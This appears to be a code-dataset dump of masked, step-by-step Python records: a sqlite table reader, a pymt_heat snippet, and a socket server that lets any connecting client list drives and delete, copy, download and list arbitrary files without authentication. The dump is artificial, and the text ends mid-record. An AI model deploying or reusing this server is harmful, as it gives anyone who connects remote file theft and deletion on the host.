"step-4": "import sqlite3\nconn = sqlite3.connect('app.db')\ncursor = conn.cursor()\ncursor.execute(\n \"select name from sqlite_master where type = 'table' order by name\")\nprint('Tables name:', cursor.fetchall())\ncursor.execute('PRAGMA table_info(user)')\nprint('Table structure:', cursor.fetchall())\ncursor.execute('select * from user')\nprint('Table record:', cursor.fetchall())\ncursor.close()\nconn.close()\n",
"step-5": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n \r\nimport sqlite3\r\n\r\n# 连接到db文件\r\nconn = sqlite3.connect('app.db')\r\n# 创建一个Cursor:\r\ncursor = conn.cursor()\r\n\r\n# 查询所有表名:\r\ncursor.execute(\"select name from sqlite_master where type = 'table' order by name\")\r\nprint(\"Tables name:\", cursor.fetchall())\r\n\r\n# 查询表user的结构:\r\ncursor.execute('PRAGMA table_info(user)')\r\nprint(\"Table structure:\", cursor.fetchall())\r\n\r\n# 执行查询表user内的所有记录:\r\ncursor.execute('select * from user')\r\nprint(\"Table record:\", cursor.fetchall())\r\n\r\ncursor.close()\r\nconn.close()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pymt_heat import Heatmodel
heat = Heatmodel()
n = heat.get_component_name()
print(n)
|
normal
|
{
"blob_id": "82801ce564f4f29e084e6f842d7868eb60f582cb",
"index": 6225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(n)\n",
"step-3": "<mask token>\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-4": "from pymt_heat import Heatmodel\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import socket
import threading
import os
import time
import psutil
import shutil
class server:
def __init__(self):
self.commandSock = socket.socket()
self.commandPort = 8080
self.transferSock = socket.socket()
self.transferPort = 8088
self.chatSock=socket.socket()
self.chatPort=8085
self.host = ''
self.bindsocket()
def bindsocket(self):
self.commandSock.bind((self.host, self.commandPort))
self.transferSock.bind((self.host, self.transferPort))
self.chatSock.bind((self.host,self.chatPort))
self.commandSock.listen(10)
self.transferSock.listen(10)
self.chatSock.listen(10)
self.filename = ""
print ("Waiting for a connection.....")
self.clientTransferSock, self.transferAddr = self.transferSock.accept()
self.clientCommandSock, self.commandAddr = self.commandSock.accept()
self.clientChatSock , self.chatAddr = self.chatSock.accept()
print("Got a transfer connection from %s" % str(self.transferAddr))
print("Got a command connection from %s" % str(self.commandAddr))
print("Got a chat connection from %s" % str(self.chatAddr))
self.sendPartitions()
self.clientCommandSock.send(('Partitions Sent').encode('utf-8'))
print('Partitions Sent!')
def closeServer(self):
self.clientCommandSock.close()
self.clientTransferSock.close()
self.clientChatSock.close()
def dicision(self):
while True:
self.message = (self.clientCommandSock.recv(32)).decode('utf-8')
#(self.message)
if self.message == 'Delete Request':
self.clientCommandSock.send('Delete Request Received'.encode('utf-8'))
self.delete()
elif self.message == 'Copy Request':
self.clientCommandSock.send('Copy Request Received'.encode('utf-8'))
self.copy()
elif self.message == 'Send File Request':
self.clientCommandSock.send('Send File Request Received'.encode('utf-8'))
self.sendFile()
elif self.message == 'Listdir Request':
self.clientCommandSock.send('Listdir Request Received'.encode('utf-8'))
self.listdir()
elif self.message == 'Chat Request':
self.clientCommandSock.send('Chat Request Received'.encode('utf-8'))
self.chat()
elif self.message == 'Mkdir Request':
self.clientCommandSock.send('Mkdir Request Received'.encode('utf-8'))
self.mkdir()
def chat(self):
self.chatfile=open('chatfile.txt','w')
self.message = self.clientChatSock.recv(128).decode('utf-8')
self.chatfile.write(self.message+'\n')
self.chatfile.close()
print(self.message)
def mkdir(self):
self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')
try:
os.mkdir(self.mkdirPath)
self.clientCommandSock.send('Directory Made'.encode('utf-8'))
print ('Directory Made Successfully!')
except:
self.clientCommandSock.send('Directory Already Exist'.encode('utf-8'))
print ('Directory Already Exist')
def send(self, directory):
print(directory)
self.filename = directory.split('\\')[len(directory.split('\\')) - 1]
self.filename = self.filename.encode('utf-8')
self.nameSize = len(self.filename)
self.nameSize = str(self.nameSize).encode('utf-8')
self.clientTransferSock.send(self.nameSize)
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'Name Size Received':
print('Waiting for Name Size to deliver...')
time.sleep(1)
else:
print('Name Size Delivered!')
self.clientTransferSock.send(self.filename)
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Name Received':
print('Waiting for File Name to deliver...')
time.sleep(1)
else:
print('File Name Delivered!')
self.filename = self.filename.decode('utf-8')
# filename = os.path.join(path,filename)
self.fileSize = os.path.getsize(directory)
self.fileSize = str(self.fileSize).encode('utf-8')
self.clientTransferSock.send(self.fileSize)
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Size Received':
print('Waiting for File Size to deliver...')
time.sleep(1)
else:
print('File Size Delivered!')
file_to_send = open(directory, 'rb')
lines = file_to_send.read()
self.clientTransferSock.sendall(lines)
file_to_send.close()
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Received':
print('Waiting for File to deliver...')
time.sleep(1)
else:
print('File Delivered Successfully!')
def delete(self):
self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')
try:
os.remove(self.deleteDirectory)
self.clientCommandSock.send('File Deleted'.encode('utf-8'))
print ('Delete successfully!')
except:
self.clientCommandSock.send('File Not Found'.encode('utf-8'))
print ('File not found!')
def copy(self):
self.pathes = (self.clientCommandSock.recv(128).decode('utf-8')).split(',')
print(self.pathes)
#shutil.copy2(self.pathes[0], self.pathes[1])
try:
shutil.copy2(self.pathes[0], self.pathes[1])
self.clientCommandSock.send('File Copied'.encode('utf-8'))
print ('Copied successfully!')
except:
self.clientCommandSock.send('File Not Found or Access Denied'.encode('utf-8'))
print ('File Not Found or Access Denied')
def sendFile(self):
self.sendFileDirectory = self.clientCommandSock.recv(128).decode('utf-8')
self.clientCommandSock.send('File Directory Received'.encode('utf-8'))
threading.Thread(target=self.send, args=(self.sendFileDirectory,)).start()
def sendPartitions(self):
self.dps_defualt = psutil.disk_partitions()
fmt_str = "{:<8}"
fmt_str.format("Opts")
self.dps = [chr(x) + ":" for x in range(65, 90) if os.path.exists(chr(x) + ":")]
self.clientCommandSock.send((str(self.dps)).encode('utf-8'))
def listdir(self):
self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')
self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))
self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath)))).encode('utf-8'))
while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Size Received':
print('Waiting for Listdir Size to deliver...')
time.sleep(1)
else:
print('Listdir Size Delivered!')
self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).encode('utf-8'))
while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Received':
print('Waiting for Listdir to deliver...')
time.sleep(1)
else:
print('Listdir Delivered!')
if __name__ == '__main__':
myServer = server()
threading.Thread(target=myServer.dicision()).start()
|
normal
|
{
"blob_id": "4736f4e06f166b3c3fd8379a2021eb84a34fcbd3",
"index": 6099,
"step-1": "<mask token>\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n <mask token>\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n <mask token>\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n <mask token>\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode(\n 'utf-8'))\n print('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n <mask token>\n <mask token>\n <mask token>\n\n def listdir(self):\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath\n )))).encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).\n encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n <mask token>\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode(\n 'utf-8'))\n print('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n\n def copy(self):\n self.pathes = self.clientCommandSock.recv(128).decode('utf-8').split(\n ',')\n print(self.pathes)\n try:\n shutil.copy2(self.pathes[0], self.pathes[1])\n self.clientCommandSock.send('File Copied'.encode('utf-8'))\n print('Copied successfully!')\n except:\n self.clientCommandSock.send('File Not Found or Access Denied'.\n encode('utf-8'))\n print('File Not Found or Access Denied')\n <mask token>\n\n def sendPartitions(self):\n self.dps_defualt = psutil.disk_partitions()\n fmt_str = '{:<8}'\n fmt_str.format('Opts')\n self.dps = [(chr(x) + ':') for x in range(65, 90) if os.path.exists\n (chr(x) + ':')]\n self.clientCommandSock.send(str(self.dps).encode('utf-8'))\n\n def listdir(self):\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath\n )))).encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).\n encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\n<mask token>\n",
"step-4": "import socket\nimport threading\nimport os\nimport time\nimport psutil\nimport shutil\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n\n def dicision(self):\n while True:\n self.message = self.clientCommandSock.recv(32).decode('utf-8')\n if self.message == 'Delete Request':\n self.clientCommandSock.send('Delete Request Received'.\n encode('utf-8'))\n self.delete()\n elif self.message == 'Copy Request':\n self.clientCommandSock.send('Copy Request Received'.encode(\n 'utf-8'))\n self.copy()\n elif self.message == 'Send File Request':\n self.clientCommandSock.send('Send File Request Received'.\n encode('utf-8'))\n self.sendFile()\n elif self.message == 'Listdir Request':\n self.clientCommandSock.send('Listdir Request Received'.\n encode('utf-8'))\n self.listdir()\n elif self.message == 'Chat Request':\n self.clientCommandSock.send('Chat Request Received'.encode(\n 'utf-8'))\n self.chat()\n elif self.message == 'Mkdir Request':\n self.clientCommandSock.send('Mkdir Request Received'.encode\n ('utf-8'))\n self.mkdir()\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode(\n 'utf-8'))\n print('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n\n def copy(self):\n self.pathes = self.clientCommandSock.recv(128).decode('utf-8').split(\n ',')\n print(self.pathes)\n try:\n shutil.copy2(self.pathes[0], self.pathes[1])\n self.clientCommandSock.send('File Copied'.encode('utf-8'))\n print('Copied successfully!')\n except:\n self.clientCommandSock.send('File Not Found or Access Denied'.\n encode('utf-8'))\n print('File Not Found or Access Denied')\n\n def sendFile(self):\n self.sendFileDirectory = self.clientCommandSock.recv(128).decode(\n 'utf-8')\n self.clientCommandSock.send('File Directory Received'.encode('utf-8'))\n threading.Thread(target=self.send, args=(self.sendFileDirectory,)\n ).start()\n\n def sendPartitions(self):\n self.dps_defualt = psutil.disk_partitions()\n fmt_str = '{:<8}'\n fmt_str.format('Opts')\n self.dps = [(chr(x) + ':') for x in range(65, 90) if os.path.exists\n (chr(x) + ':')]\n self.clientCommandSock.send(str(self.dps).encode('utf-8'))\n\n def listdir(self):\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath\n )))).encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).\n encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\nif __name__ == '__main__':\n myServer = server()\n threading.Thread(target=myServer.dicision()).start()\n",
"step-5": "import socket\nimport threading\nimport os\nimport time\nimport psutil\nimport shutil\n\n\n\nclass server:\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock=socket.socket()\n self.chatPort=8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host,self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n\n self.filename = \"\"\n print (\"Waiting for a connection.....\")\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock , self.chatAddr = self.chatSock.accept()\n\n print(\"Got a transfer connection from %s\" % str(self.transferAddr))\n print(\"Got a command connection from %s\" % str(self.commandAddr))\n print(\"Got a chat connection from %s\" % str(self.chatAddr))\n\n self.sendPartitions()\n self.clientCommandSock.send(('Partitions Sent').encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n\n def dicision(self):\n while True:\n self.message = (self.clientCommandSock.recv(32)).decode('utf-8')\n #(self.message)\n if self.message == 'Delete Request':\n self.clientCommandSock.send('Delete Request Received'.encode('utf-8'))\n self.delete()\n elif self.message == 'Copy Request':\n self.clientCommandSock.send('Copy Request Received'.encode('utf-8'))\n self.copy()\n elif self.message == 'Send File Request':\n self.clientCommandSock.send('Send File Request Received'.encode('utf-8'))\n self.sendFile()\n elif self.message == 'Listdir Request':\n self.clientCommandSock.send('Listdir Request Received'.encode('utf-8'))\n self.listdir()\n elif self.message == 'Chat Request':\n self.clientCommandSock.send('Chat Request Received'.encode('utf-8'))\n self.chat()\n elif self.message == 'Mkdir Request':\n self.clientCommandSock.send('Mkdir Request Received'.encode('utf-8'))\n self.mkdir()\n\n def chat(self):\n self.chatfile=open('chatfile.txt','w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message+'\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print ('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode('utf-8'))\n print ('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n\n # filename = os.path.join(path,filename)\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print ('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print ('File not found!')\n\n def copy(self):\n self.pathes = (self.clientCommandSock.recv(128).decode('utf-8')).split(',')\n print(self.pathes)\n #shutil.copy2(self.pathes[0], self.pathes[1])\n try:\n shutil.copy2(self.pathes[0], self.pathes[1])\n self.clientCommandSock.send('File Copied'.encode('utf-8'))\n print ('Copied successfully!')\n except:\n self.clientCommandSock.send('File Not Found or Access Denied'.encode('utf-8'))\n print ('File Not Found or Access Denied')\n\n def sendFile(self):\n self.sendFileDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('File Directory Received'.encode('utf-8'))\n threading.Thread(target=self.send, args=(self.sendFileDirectory,)).start()\n\n def sendPartitions(self):\n self.dps_defualt = psutil.disk_partitions()\n fmt_str = \"{:<8}\"\n fmt_str.format(\"Opts\")\n self.dps = [chr(x) + \":\" for x in range(65, 90) if os.path.exists(chr(x) + \":\")]\n self.clientCommandSock.send((str(self.dps)).encode('utf-8'))\n\n def listdir(self):\n\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n 